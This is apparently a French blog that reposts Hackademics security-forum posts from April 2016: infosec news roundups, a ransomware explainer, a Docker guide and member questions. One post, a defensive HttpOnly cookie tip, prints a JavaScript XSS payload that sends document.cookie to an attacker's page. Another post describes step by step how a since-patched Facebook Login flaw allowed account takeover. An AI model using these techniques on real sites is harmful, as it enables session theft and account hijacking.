samedi 30 avril 2016

Comment se protéger contre les failles xss par vol des cookies en php version >= 5.2

Salut

Je partage avec vous une petite astuce sur la protection contre les failles XSS exploitant les cookies.
Je me penche beaucoup plus sur la protection contre l'exploitation des failles XSS par le vol des cookies.

Exemple d'un script javascript pour voler les cookies dans une failles XSS :

Code:

<a href="#" onclick="window.location='http://ift.tt/1pRCRR9'+encodeURI(document.cookie); return false;">Cliquer ici</a>
"informations.php" est une page php hébergée dans le site du pirate. La fonction "encodeURI(uri)" pour l'encodage.
On crée un événement click dans un lien qui va diriger les informations (cookie) dans une page php et ensuite on bloque l'action par défaut de cette événement avec "return false;"

- Méthode de protection permanente
Une manière plus simple est de configurer le fichier "php.ini" afin d'activer certaines directives très importantes :
Code:

session.cookie_secure = True
pour obliger la transmission des cookies sur des connexions sécurisées. (protocole HTTPS)
Code:

session.cookie_httponly = True
pour protéger les cookies contres la manipulation frauduleuse des scripts (script javascript).

- Méthode de protection temporaire (relative à une page php)
On les codes suivantes :

Code PHP:

<?php setcookie('rodrigue''daniel'time() + 365*24*3600nullnullfalsetrue); ?>
Pour des cookies simples (celles qui ne sont pas des cookies de session). Le dernier paramètre est à "true".

Code PHP:

<?php
session_set_cookie_params
(... , ... , ... , TRUETRUE);
session_start();
?>

Pour des cookies de session de manière temporaire (lors de la navigation). L a fonction session_set_cookie_params() permet de configurer les paramètres d'une cookie de session. Toutefois le premier TRUE nécessite une connexion sécurisée en HTTPS. Si on a uniquement HTTP, il faut l'omettre. Et le deuxième TRUE permet d'activer l'option httpOnly. J'ai laissé les autres options pour m'intéresser sur l'essentiel (option de sécurité).

Mais apparemment (lecture dans un article) avec httpOnly, en lisant les requêtes XMLHttpRequest, on peut contourner l'option "httpOnly"

QUESTION EN SUSPEND : COMMENT FAIRE SI LE PIRATE EFFECTUE LA LECTURE DES REQUËTES XMLHttpRequest DANS UNE FAILLE XSS ?

Référence : http://ift.tt/24bYIFO

MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCS7n
via IFTTT

Retour et grande idée

Bonjour à tous,

ça fait pas mal de temps que je n'étais pas revenue sur Hackademics, je voguais un peu partout à la recherche d'information en tout genre ...

Bref, en regardant cette vidéo : https://www.youtube.com/watch?v=-r-B1uOj0W4

Je me suis demandé :
- Est ce que nous avons une team CTF ?
- Des gens seraient ils intéressés ? ( J'ai vraiment adoré la mentalité de Tyler !)
- Il y a t'il des gens qui font la NDH ?


WorldCitizen / XCtzn


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/24bYGOd
via IFTTT

News Le blackmarket de tueurs Besa Albanian Mafia blackmarket aurait été piraté


Sur le blackmarket, on peut faire son petit shopping. Cela va des objets présents normalement sur Amazon aux armes en passant par les organes en tout genre. Une vraie caverne d'Ali baba un peu glauque.

Et bien l'un de ses "magasins en ligne" aurait récemment été piraté.
Ce magasin, c'est Besa Albanian Mafia.

Celui-ci se présente simplement comme la mafia Albanaise, présente dans tous les pays pour des services d'assasinat.
D'après les sources, le prix dépendrait des "options" que vous choisissez, du passage à tabac à la torture.
L'importance sociale de la personne à "liquider" aurait également une influence sur le prix.

Ça sent le fake mais ce n'en est pourtant apparement pas un.
Les données récoltées lors du piratage partant des habituelles données client au photo preuve des meurtres.

Source :
http://ift.tt/24bYGOa


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCRR5
via IFTTT

News Les visiteurs de The Pirate Bay infectés par un Ransomware


Encore un ransomware ?!

Et bien oui encore.
Et pour reprendre un vecteur d'infection assez couru, celui-ci utilise des publicités infectées sur les sites web afin d'utiliser une faille de Adobe et crypter vos données avec le crypto-ransomware Cerber (si vous ne savez plus ce qu'est un ransomware, c'est par ici)

Ces publicités infectées sont alors utilisées sur des sites à haut traffic afin "d'optimiser" l'infection.
Cette technique est appelée le malwaretising. Un nom élégamment trouvé pour un vecteur qui pourrait faire des ravages.


Ce malware est il le coup d'un pirate ou d'un gouvernement voulant a tout prix limiter le téléchargement illégal, nous n'en saurons probablement jamais rien.

Sachez cependant que des plugins de navigateur tels que Adblock (pour ne citer que lui) réduisent considérablement ce risque d'infection.
Une raison de plus d'utiliser des bloqueurs de pub donc.


Source :
http://ift.tt/24bYGO5


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCRR1
via IFTTT

News 7 millions de compte Minecraft piratés


Qui n'a jamais fait une petite partie de Minecraft pour se changer les idées ?
Une petite maison en bouse après une dure journée de boulot, rien de mieux !

Et bien si pour ce faire, vous utiliser la communauté indépendante Lifeboat (et en particulier leurs serveurs pour la pocket edition, sur mobile), allez vite changer votre mot de passe.
En effet, l'un des serveurs de la communauté a été hacké et des emails passwords sont dans la nature.

Rien de bien grave me direz vous, les mots de passes sont hashés.
Et bien oui, ils le sont, ... Mais en MD5.
Hors, comme vous le savez sûrement, MD5 a été cassé. Il n'est plus sécurisé.

De plus, coup du sort ou incompétence mais Lifeboat conseillait à ses clients d'utiliser des mots de passe forts mais court prétexant que : "Après tout, nous ne sommes pas une banque en ligne".
En effet, ils ne sont pas une banque en ligne. Cependant, la sécurité doit être mise en place à tous les niveaux si on souhaite qu'elle soit un minimum efficace.

Source :
http://ift.tt/24bYIFI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCUfJ
via IFTTT

News Une faille dans le login de Facebook


La sécurité, ce n'est pas la gloire chez Facebook pour le moment.
La semaine dernière, nous vous signalions une backdoor et bien cette semaine, ce sera une faille dans le login.

Cette faille permet d'utiliser la fonctionnalité Facebook login (celle qui permet de vous connecter avec votre compte Facebook sur d'autres sites) afin d'accéder sans mot de passe à certain de vos comptes en lignes qui le permettent.
Il serait ainsi, par exemple, possible de se connecter à votre compte chez votre fournisseur d'antivirus et de désactiver la protection sur certain de vos appareils pour mieux les infecter.

Pour exploiter la faille, rien de plus simple, il suffit de prendre l'une des adresses mail de la personne (une adresse qui n'est pas encore utilisée sur Facebook) et de créer un compte Facebook avec.
Après l’inscription, il suffit de remplacer l’adresse e-mail par une autre dont vous avez le contrôle.
Ensuite il faut tenter de se connecter sur un autre site via le bouton Facebook Login (avec l’adresse e-mail de la victime), vous devriez normalement avoir à confirmer votre propre adresse e-mail, et non celle de la victime.

La faille a bien évidement dors-et-déjà été corrigée par Facebook.

Source :
http://ift.tt/1pRCUfD


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/24bYIFB
via IFTTT

News Spotify aurait-il été piraté ?


Depuis, peu une partie de base de données contenant des informations personnelles sur les clients du service Spotify circule sur le Blackmarket.
Le société assure cependant ne pas s'être faite pirater.

Deux possibilités donc :
  1. Cette base de données est dévoilée dans un but de phishing (en bon gars que vous êtes, vous essayer de mettre la personne au courant que son mot de passe cirucle sur le web et on vous répond par un (gentil) mail infecté)
  2. La société a en effet été piratée et refuse de l'admettre


Dans le second cas, cela peut signifier que le service pourrait ne pas être assez sécurisé pour se rendre compte qu'il y a eu intrusion. Ce qui est d'autant plus inquiétant en soi.
De plus, si il existe bien une faille, et maintenant que les pirates savent qu'il peut en exister une, on peut supposer qu'elle va être outrageusement exploitée par d'autres pirates.

Dans tous les cas, le bon sens devrait donc vous souffler d'aller changer votre mot de passe sur le service en ligne !

Autre solution expliquée par tonton Korben, héberger votre clone de Spotify vous même :
http://ift.tt/24bYGhb

Source :
http://ift.tt/24bYGxq


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCTIL
via IFTTT

Voler un cookie puis le remplacer

Bonjour,

Si je récupère le fichier cookie de qqn pour un site web et que je le met dans mes cookies sur mon ordinateur, pourrai-je me connecter au site ?

Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCTID
via IFTTT

Presentation Pragma

Bonjour à tous,

L'inscription étant compromise je viens me présenter à tous, et remercier par la même occasion le staff à l'avance ainsi que le staff du compte twitter Hackademics, trêve de bavardage :

Pseudo (+autres si plusieurs) : shEckHy / Pragma
Connaissances informatiques générales : VM / Systeme / Reseau (quelques bases)
Connaissances en hacking : Quasi aucunes
Système d'exploitation principal : Windows / Mac os
Je viens sur ce forum pour : Apprendre, découvrir, discuter
J'ai connu ce forum via : Moteur de recherche
Informations supplémentaires (job, intérêts, autres...) : Je suis étudiant en informatique (en BTS SIO) et je souhaite m'orienter plus tard dans la sécurité informatique.

Voilou, merci de votre attention, à très vite :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/24bYHSb
via IFTTT

News Dossier Ransomware 2016 : 3. Conclusion et liens utiles

Dossier Ransomware : Conclusion


Nous arrivons doucement à la fin de notre dossier concernant les ransomwares.

Pour rappel, nous y avons vu quel est l'historique ainsi que les différents types et les vecteurs d'infection de ce type de malware.
Nous avons également abordé quels étaient les ransomwares les plus courant avec leur effet sur votre machine.
Nous avons finalement évoqué les méthodes de protection pré et post infection.

Cependant, si ce dossier approche de sa fin, soyez sur que ce n'est pas la fin des ransomwares.
Afin, comme nous l'avons évoqué, ils forment un business model très rentable pour les cyber criminels.

Attendons nous donc à en voir de nouveau débarquer avec des méthodes d'infection inédite ou des charges virales innovantes.
On pourrait, par exemple, imaginer des ransomwares uploadant vos données sensibles sur des serveurs pirates avant de les crypter sur votre machine.

Évidement, les experts en infosec et les éditeurs d'antivirus trouveront également des parades mais quel dans tous les cas, le meilleur moyen de resté en sécurité sera de se tenir informé.

Pour aller plus loin
Nos précédentes new à propos des ransomwares :


Liens utiles :


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1pRCRjT
via IFTTT

News Dossier Ransomware 2016 : 1. Introduction aux ransomwares, qu'est-ce que c'est ?

Dossier Ransomware : Introduction


Vous l'aurez sans doute remarqué, mais en ces mois de mars et d'avril 2016, nous avons une énorme recrudescence de ransomwares. Après Locky est venu Petya, suivi de prêt par Keranger et Jigsaw. Ils sont présents sur la toile et ne semblent pas vouloir en partir. Quand une solution est trouvée, une nouvelle mouture fait son apparition apportant avec elle son lot de nouveaux vecteurs d'infections et d'effet sur votre machine.

Mais que sont réellement les ransomwares ?
Quels en sont vraiment les risques ?
Quels sont leurs effets sur votre ordinateur ?
Que faire si vous êtes infecté ?
Comment se prémunir d'une infection ?

Voici une partie des questions auxquelles nous allons répondre dans ce dossier spécial dédié aux ransomwares.

Qu'est-ce-qu'un ransomware ?
Avant de nous lancer dans de plus amples explications, il est bien de savoir ce qu'est une ransomware.
Un ransomware ou rançongiciel en français est un malware ayant pour but de vous extorquer de l'argent.
Il en existe de deux types :
1. Les ransomwares sans chiffrement
2. Les ransomwares avec chiffrement ou cryptoransomwares

Les ransomwares sans chiffrement effectuent des actions sur votre machine dans le but de vous faire payer une rançon.
Ainsi, WinLock affichait des images pédopornographiques sur les machines infectées et demandaient à ceux-ci de payer une rançon via des sms surtaxés afin de débloquer la machine.
Un autre exemple, Windows Product Activation, prévenait l'utilisateur que son Windows devait être réactivé et pour ce faire, l'utilisateur devait appeler 6 numéros surtaxés. Les ransomwares sans chiffrement n'infligent donc pas de dommages irrémédiables à votre machine.

De leur côté, les cryptoransomwares cryptent vos données (et parfois d'autres parties de votre système) avant de vous demander une rançon pour le déchiffrement.
Dépendant du ransomware qui vous a infecté, vous aurez donc plus ou moins de dégâts (comme nous le verrons dans la partie 4).
Ce qui est certain, c'est que ce type de ransomware cryptera vos données.

L'historique des ransomware
Le premier ransomware référencé est PC Cyborg Trojan (en 1989), le malware prévenait l'utilisateur que sa licence pour un certain logiciel n'était plus valide.
Les cibles étaient alors invitées payer 189 dollars à une société pour que leurs fichiers soient déchiffrés.
Cependant, erreur de conception ou chance pour les victimes, le chiffrement était symétrique donc relativement facile à casser.
C'est en 1996 que Adam L.Young et Moti Yung ont évoqué l'idée d'introduire un chiffrement asymétrique tel que le RSA dans ce genre d'attaques.
Cette idée ne fut cependant exploitée qu'à partir de 2005 environ. En 2006, GPcode.AG utilisait un chiffrement RSA avec une clé de 660 bits. En 2008 est sortie une nouvelle version de ce malware qui utilisait une clée de 1024 bits.
C'est à ce moment que les efforts nécessaires au déchiffrement sont devenus bien trop important pour être envisageable.
En effet, casser une clé de 1024 bit nécessiterait une puissance de calcul titanesque et massivement distribuée.

Parallèlement à ce gamme de ransomware utilisant le chiffrement pour prendre en otage les données des victimes, un second groupe de malware de ce type s'est développé.
Des ransomwares ne chiffrant pas les données mais ayant d'autres effets néfastes sur les machines des victimes.
Par exemple, en 2012, le malware Reveton infectait les machines des victimes et leur indiquait que leur ordinateur avait été repéré comme faisant du téléchargement illégal. Les victimes étaient alors invitées à payer via des coupons en lignes.

Avec l'évolution des technologies, les ransomwares utilisent maintenant des moyens de payement en bitcoin et font transiter les données échangées avec les serveurs pirates via les réseau Tor. Ces deux moyens permettant aux cyber criminels de rester relativement anonymes.

En cette année 2016, nous voyons une recrudescence de ransomware dont pour la toute première fois un malware de ce type s'attaquant aux machines sous OSX (Keranger).

Pourquoi cette recrudescence de ransomwares ?
La réponse à cette question est simple.
Parce que ça rapporte beaucoup d'argent.
En effet, dans ce monde du numérique, chacun d'entre nous stocke une impressionnante quantité de données.
Celles-ci peuvent aller du plus insignifiant fond d'écran à votre fichier texte contenant l'intégralité de vos mots de passe (ce qui est d'ailleurs, au passage, loin d'être conseillé).
Perdre toutes ces données, c'est donc perdre toute une partie de sa vie. La plupart des gens donneraient donc beaucoup pour récupérer leurs données perdues.

Petit rappel théorique
Dans ce dossier, deux vecteurs d'infection vont fréquemment être abordés : le phishing et le spear-phishing.
Voici donc un petit rappel théorique dédié aux plus tête en l'air d'entre-vous.

Le phishing ou hameçonnage en français , est une méthode utiliser par les pirates, dans le but de vous soutirez des informations personnelles (votre mot de passe, votre numéro de carte…).
Ou encore de vous faire téléchargez un logiciel, d'ouvrir une pièce jointe, ...
Le phishing est utilisé principalement par mail.
Le but de cette méthode consiste à se faire passer pour une banque ou une entreprise, afin de vous soutirez des informations.
Dans une tentative de phishing, le message est dit générique, il est fait pour être envoyé à un grand nombre de personnes. Les personnes ne sont pas repérées à l'avance, on espère que l'une d'entre elles tombera dans le panneau.


Le spear-phishing, quant à lui, reprend les bases du phishing, mais en plus poussées et en plus ciblées.
Il s'appuie également sur du social engineering.
En spear phishing, le message n'est plus générique, il n'est plus destiné à un grand nombre de personnes, mais à un petit groupe, voir même une seule personne (repérée au préalable).
On sait que le victime va donner ses informations, car on se sera renseigné sur elle, pour paraître le plus crédible possible.

Organisation du dossier
Chaque partie de ce dossier a pour but de vous faire découvrir un nouvel aspect du monde des ransomwares.

Ce dossier sera donc composé de 3 parties :
1. Une introduction au monde des ransomwares (cette page)
2. Une description des ransomwares les plus connus accompagnée des techniques pour la protection pré et post infection
3. Une conclusion munies de lien pour aller plus loin.

Lire la suite : Dossier Ransomware 2016 : 2. Méthodes de protection et désinfection pour chaque ransomware


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/24bYEWr
via IFTTT

lundi 25 avril 2016

News L'actualité infosec de la semaine - 5ème numéro (17 avril au 24 avril)

L'actualité infosec de la semaine - 5ème numéro (17 avril au 24 avril)




GozNym - Le trojan bancaire dévastateur des Amériques

GozNym, c'est le nom du nouveau malware américano-canadien responsable du vol de 4 million de dollars dans plus de 24 banques différentes. Découvert par l'équipe IBM X-Force Research, le code malveillant combine en fait les deux puissants logiciels malveillants que sont Nymaim et Gozi. Le malware se diffuse via des campagnes de phishing, puis, une fois installé sur la machine, se contente de soutirer les données bancaires des victimes. Affaire à suivre.

Source: http://ift.tt/1Vx9ql6


Quatre membres présumés du groupe hacktiviste DownSec sous les verrous

Quatre hacktiviste présumés du groupe d'DownSec, notamment connu pour de nombreuse attaques DDOS à l'encontre des gouvernements Belges et Français, viennent d’être interpellés par la police judiciaire fédéral Belge. Les quatre individus, deux adultes et deux adolescents, sont originaires de la ville de Liège et de la région de Namur. L’enquête est actuellement toujours en cours, et du materiel informatique à été saisi. Les présumés pirates risquent, s’ils sont reconnus coupable des attaques DDoS de 6 à 36 mois de prison, et jusqu’à 25.000 euros d’amende.

Source: http://ift.tt/1XKtqym

Signal-Spam - Le baromètre du spam 2016

L’association Signal-Spam vient de publier son baromètre de la perception du spam au premier trimestre 2016, basé sur les signalements. D'après leur relevés, les campagnes de phishing sont de plus en plus nombreuse, et près de 60% d'entre elles sont de nature cybercriminelles. A noter également une explosion des mails contenant des pièce jointes malveillantes. Le seul point positif est la baisse des arnaques type avance de frais.

Source: http://ift.tt/1pxtwO1

Opera - Un VPN gratuit intégré au navigateur

La dernière version du navigateur Opera Developer vient de se voir agrémenter d'une option plutôt sympathique : Un VPN gratuit. Cela a été rendu possible grâce à leur acquisition l'année dernière de SurfEasy, un fournisseur de VPN. A l'heure acuelle seul trois pays sont proposés: L’Allemagne, le Canada et les États-Unis. Évidement, le surf ors du navigateur de passe pas par le VPN.

Source: http://ift.tt/1MK48jA

Android - Une nouvelle arnaque de jeux gratuits pour pirater Facebook

De faux jeux gratuits pour Android se révèlent être des malwares déguisés, comportant un kit de phishing Facebook intégrer. Plus d’un million de personnes en aurait été victime dans le monde. La ruse est plutôt bien rodée, et assez vieille, car elle date de 2015, mais l’absence de vérification "humaine" pour les applications disponible sur le Play Store ne permet pas d’endiguer la chose. En effet, de nombreux jeux gratuits se révèlent être des trojans, déstinés à pirater votre compte Facbook. A la fin de chaque patie, le jeu en question vous propose de partager votre score sur les réseaux sociaux. PLus d'un million de personnes se sont ainsi fait pirater leur compte, et à l'heure actuelle, ne soupçonne même pas la dite application.

Source: http://ift.tt/1pxtxlh

Une backdoor dans Facebook

Comment faire pour hacker Facebook ?
Voilà l'une des questions les plus posées par les débutants en hacking.
Que ce soit pour espionner votre copine ou pour un bounty, chacun a ses raisons.

Et bien dans sa recherche de vulnérabilité (il en a trouvé 7) sur le site du géant social, un expert en infosec a trouvé un backdoor installé dans les serveurs périphérique de Facebook.
Ce backdoor servait à voler les mot de passe des employés et les utilisateurs seraient donc toujours en sécurité.

Source : http://ift.tt/1Vx9rFC

Pour les créateurs du SpyEye Botnet, ce sera la prison

Cette semaine, les deux créateurs du SpyEye Botnet et en particulier de leur malware Zeus ont été condamné à 24 ans de prison ferme.
24 ans, peine cumulée c'est à dire que l'un a écopé de 19 ans et l'autre 5.
Quoi qu'il en soit, il ne semble pas que ce soit une bonne idée de vendre et de produire des malwares pour botnet.
Restez donc White Hat !

Source : http://ift.tt/1Vx9ukW

Une IA pour détecter les cyber attaques

AI2, c'est le doux nom de l'intelligence artificielle développée par le MIT qui se targue de pouvoir détecter 85% des cyber attaques.

L'idée de base est simple. Durant la journée, le système analyse automatiquement tous les paramètres qu'il souhaite.
Il soumet ensuite ses découvertes à des utilisateurs humains qui se chargent de situer celles qui sont bel et bien des essais d'infraction.
Le système apprend ainsi à les reconnaitre et à réagir en fonction.

Source : http://ift.tt/1pxty8J

OnionIRC : Un IRC anonyme et chiffré

Et non, OnionIRC n'est pas un nouveau chan dédié à notre amour inconditionnel pour le oignons.
C'est un nouveau type d'IRC (Internet Relay Chat) permettant de discuter sur le web de façon anonyme et chiffrée.
Mieux encore, ce système nous est offert par le groupe hacktiviste anonymous !

Source : http://ift.tt/1pxtzJL

Pagat.txt, la backdoor que vous avez peut-être sur votre serveur

Le fichier pagat.txt est une shell PHP qui pourrait infecter votre serveur si vous utilisez des CMS.
Les CMS permettent de grandes choses. Cependant, leurs plugins ne sont pas toujours aussi sécurisés qu'ils le devraient et, parfois, ils permettent l'upload de fichiers tel que pagat.txt.

D'après IBM, les infections par ce fichier ont augmenté de 45%.
Pensez donc bien à vérifier votre serveur.

Source : http://ift.tt/1pxtypb


Par Bioshock, Anonyme77 & _47


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Vx9ul4
via IFTTT

samedi 23 avril 2016

Introduction à la conteneurisation avec Docker

Bonjour à tous, aujourd’hui je vous partage un guide d’initiation aux concepts liés à la conteneurisation et à la prise en main de l’outil Docker.

Si vous rencontrez des difficultés, constatez une erreur, estimez une partie trop complexe et qui nécessiterait de plus amples explications, n’hésitez pas à me contacter afin de me décrire précisément votre problème, je ferais de mon possible pour vous aider.

N’hésitez pas non-plus à apporter des compléments d’informations, j’accepte les critiques, remarques et conseils !

Table des matières

Code:

Qu’est-ce que Docker ?...................................2
Quelques définitions.....................................3
    LXC..................................................3
    CGroups..............................................7
    LibContainer.........................................7
Composants de Docker.....................................9
    Docker Engine........................................9
    Docker Registry......................................9
Installation de Docker..................................10
    Debian Jessie.......................................10
    Windows.............................................12
Docker Machine..........................................13
Docker Image............................................14
Docker Container........................................16
Cas pratique : Nginx....................................18
    Création du conteneur...............................18
    Installation de Nginx...............................18
    Création d’une image................................19
DockerFile..............................................20
    Cas appliqué à Nginx................................20
Docker Hub..............................................21
Docker Volume...........................................24
Docker Compose..........................................27
    Préparation du système..............................27
    Installation de Docker Compose......................28
    Création d’un environnement de développement WEB....29
Conclusion..............................................31
Sources.................................................32

Lien de téléchargement du PDF et des ressources associées : ge.tt.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/23Rc36i
via IFTTT

[ WiTips, une chaîne dédiée à la sécu des réseaux wifi ]

Bonjour à tous,

J'ai pris la décision d'ouvrir une chaîne Youtube dédiée à la sécurité des réseaux wifi pour compléter mes prochains post sur le forum.

C'est ma première aventure sur Youtube, et j’espère proposer un contenu innovant et éducatif.

Cordialement,

Shirocen:WiTips.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1WNzkAB
via IFTTT

jeudi 21 avril 2016

Recherches de livres precieux

Je cherche ces livres Scripts shell, linux et unix : Avec 30 scripts prêts à l'emploiet
Développement système sous Linux: Ordonnancement multi-tâche, gestion mémoire, communications, programmation réseau de Christophe Blaess au format pdf
Merci.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VJKAhM
via IFTTT

Problème de compréhension de l'attaque de contournement des censures : IP over DNS

Salut

J'ai fait la connaissance d'une attaque dernièrement : l'attaque de l'IP over DNS.
J'ai lu certains articles à ce sujet. J'ai appris qu'elle permet de contourner certaines
censures appliquées dans certains réseaux. Je prend le cas des réseaux sans fil avec un portail captif
configuré sur Mikrotik, pfsense ou zeroshell (peu importe).
J'ai fait la connaissance d'un programme qui implémente cette notion (IP over DNS) : programme iodine.
Je ne comprend pas concrètement ce qui se passe (malgrè que j'ai lu certaines explications). Je souhaiterais
comprendre en profondeur avec la notion du modèle OSI ou TCP/IP, couche par couche.

SVP aidez-moi à comprendre.
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1TlmqXB
via IFTTT

lundi 18 avril 2016

News L'actualité infosec de la semaine - 4ème numéro (11 avril au 17 avril)

L'actualité infosec de la semaine - 4ème numéro (11 avril au 17 avril)


ManameCrypt - Encore un ransomware

ManameCrypt est un nouveau ransomware découvert par le G DATA SecurityLabs, il se différencie de ses semblables par plusieurs points, notamment sa méthode de transmission et le fait qu'il bloque le programme installé sur la machine.



ID Ransomware - Diagnostiquez vos ransomwares

Les ransomwares font fureur sur le net en ce moment, et bon nombre de victimes ont du passées à la caisse. Mais voici ID Ransomware, un outil en ligne, permettant d’identifier et de déchiffrer les ransomwares de manière extrêmement précise.



La France dans les 10 pays les plus cybercriminel du monde

Une étude dévoilée par Symantec, une société d'infosec américaine, démontre que la France est devenue une des cibles primordiale des cybercriminels aux cotés de la Chine et des États-Unis. Cela s'explique notamment avec l'expansion des ransomwares en Europe.



Jigsaw - Le ransomware le plus sadique

Jigsaw est un ransomware découvert cette semaine. À l'heure actuelle, personne ne sait comment il se transmet. Comme un ransomware classique, il va crypter tous vos fichiers, afin de vous extorquer de l'argent. Mais pour faire pression sur la victime, et l'inciter à payer plus rapidement, Jigsaw supprime un peu de vos fichiers toutes les heures, jusque à ce qu'il ne reste plus rien à sauver. Heureusement, des chercheurs ont trouvés le moyen de le déchiffrer.



Une backdoor opensource pour Chrome

Un informaticien Français a récemment libéré, en Open Source, un plugin Chrome permettant de backdoorer ce navigateur Web.
Au programme, vol d'identifiants, de mots de passe, de conversations facebook et de toutes les informations que vous pouvez écrire en ligne.
Mieux encore, le tout peut être contrôlé par une simple interface web !



Les États Unis lancent des cyber attaques contre l'état islamique

Les États Unis ont cette semaine décidé d'attaquer le groupe terroriste État Islamique avec un nouveau type de bombe, les bombes informatiques.
Et même si ils définissent pas ce très vague terme, ils affirment que cela fonctionne plutôt bien.



DDOS sur les serveurs de Blizzard : La nuit où les gamers ont dû dormir

Cette semaine, les gamers ont eu une bonne nuit de sommeil forcé.
En effet, durant une nuit, les serveurs de Blizzard ont subi de lourde attaques DDOS ayant entravé l'expérience des joueurs.
Warcraft, Hearstone, ... tous ont étés touchés.



L'Hacktiviste Lauri Love devra t'il donner ses clefs de déchiffrement ?

Lauri Love est un hacktiviste bien connu.
Il a en particulier compromis la sécurité informatique du FBI et de la NASA dans une opération menée conjointement avec le groupe Anonymous.
Love a maintenant été arrêté par les autorités anglaises qui tentent par diverses stratégies de l'obliger à fournir ses clefs de déchiffrement de ses fichiers.



Badlock : une vulnérabilité critique de SMB patchée

Samba, c'est pratique. Il permet de partager des fichiers, des dossiers, des imprimantes et beaucoup d'autres choses sur un réseau local.
Cependant, autant de partage, c'est aussi un risque.
Et bien cette semaine, ce risque a été quelque peu réduit.
En effet, les développeurs de Samba pour Windows ont dévoilés un patch de sécurité pour réparer une faille critique de leur implémentation



Le ver QBot est de retour

QBot est un ver informatique qui était principalement actif en 2009.
C'est donc en cette année que les antivirus ont appris à le reconnaitre.
Et bien cette semaine, des experts en sécurité informatique ont relevés sur internet des traces d'une nouvelles versions de ce vers.
Toutes les versions de Windows seraient vulnérables.


By Bioshock, Anonyme77 & _47


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SrqsR6
via IFTTT

Document en version Français

Ce lien ci http://ift.tt/1SgmV2J donne le document Introduction to Algorithms
Third Edition
en anglais. je voudrais savoir si quelqu'un connaitrait un lien ou le document est traduit en français.
Merci


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1r9WFki
via IFTTT

samedi 16 avril 2016

News ManameCrypt - Encore un nouveau ransomware.


Décidément, rien ne semble endiguer le fléau des ransomwares. Ces programmes malveillants sont plus nombreux chaque jour, avec de nouvelles méthodes, et des modes de fonctionnement qui évoluent sans cesse.

Celui-ci se prénomme ManameCrypt, découvert par le G DATA SecurityLabs, il est particulièrement original, et ce pour plusieurs raisons.

Pour commencer, sa méthode de propagation. Contrairement à beaucoup de ses semblables, celui-ci ne se transmet pas par mail, mais par des versions de logiciel de Torrent.

Une fois installé sur la machine, le ransomware crypte vos données, pour demander une rançon d'environ 130€.

Citation:

*.3g2 *.3gp *.7z *.asf *.avi *.doc *.docx *.flv *.gif *.jpeg *.jpg *.m4v *.mov *.mp4 *.mpeg *.mpg *.pdf
*.png *.ppd *.pps *.ppt *.pptx *.psd *.qt *.rm *.tiff *.txt *.wmv *.wpd *.wps *.xlr *.xls *.xlsl *.zip
La liste des extensions cryptées par ManameCrypt


Le ransomware ne s'arrête pas la. Il bloque l’exécution de certain programme sur la machine, afin de la rendre vraiment inutilisable.

ad-aware facebook registry editor
amazon game rune
anti virus instagram shop
anti-virus internet security sophos
antivirus kaspersky steam
avg system configuration
avira mcafee system restore
bitdefender meetme task manager
bullguard monitor trend micro
comodo netflix tumblr
debugger norton twitter
dr.web obfuscator vimeo
ebay origin vipre
eset pinterest youtube
f-secure registry
La liste des programmes bloqués par ManameCrypt


Mais rassurer vous, si vous êtes victime de ce ransomware, il est possible de récupérer certaines de vos données ! Prenons le cas d'un fichier.RAR, le mot de passe se décompose de manière suivante:

SHA1Hash (Win32_processor.processorID + VolumeSerialNumber_Volume_C + Win32_BaseBoard.SerialNumber) + nom d’utilisateur.

Le SHA1 est le nom du fichier .RAR. Le nom peut être déterminé comme suit: appuyez sur la touche Windows + R; puis entrez cmd et appuyez sur Entrée. Dans la fenêtre de ligne de commande nouvellement ouverte, entrez echo% username% et appuyez sur Entrée à nouveau. La chaîne affichée est le nom d’utilisateur.

Exemple: Le fichier .RAR créé par Manamecrypt est appelé 123456789DSB et le nom d’utilisateur est 92829. Le mot de passe est donc 123456789DSB92829.

Source: datasecuritybreach, gdatasoftware


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Tb79Zl
via IFTTT

News DDOS sur les serveurs de Blizzard : La nuit où les gamers ont dû dormir


Dans la nuit de mercredi à jeudi, les serveurs de Blizzard ont subis une suite de violentes attaques DDOS.

World of Warcraft, Diablo III, StarCraft 2, Hearthstone, etc tous ont été touchés par cette attaque.
Blizzard a aussitôt réagi en publiant l'information sur son Twitter et sur leur lanceur Battle.net.
Un fil de discussion a aussi été créé afin de répondre au mieux aux utilisateurs.

Si la société se refuse de dénoncer les auteurs de ces attaques, ils n'ont toutefois pas été difficiles à dénicher.
